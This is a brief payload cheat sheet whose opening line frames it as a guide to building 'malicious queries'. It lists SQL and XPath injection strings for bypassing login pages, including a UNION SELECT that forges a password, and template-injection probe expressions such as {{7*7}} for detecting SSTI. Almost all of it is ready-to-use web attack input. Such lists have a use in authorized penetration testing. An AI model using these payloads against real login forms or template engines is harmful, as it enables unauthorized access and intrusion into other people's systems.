
(Knowing what database we are dealing with makes it easier to understand how to construct our malicious queries)

🗲Login Page🗲

USERNAME : admin' UNION SELECT '12345' AS password#    PASSWORD : 12345

admin' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
' or '1'='1
' or ''=''
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
or 1=1 group by round(rand(0)) having min(0);#


🗲Ssti🗲
{7*7}
*{7*7}
{{7*7}}
[[7*7]]
${7*7}
@(7*7)
<?=7*7?>
<%= 7*7 %>
${= 7*7}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
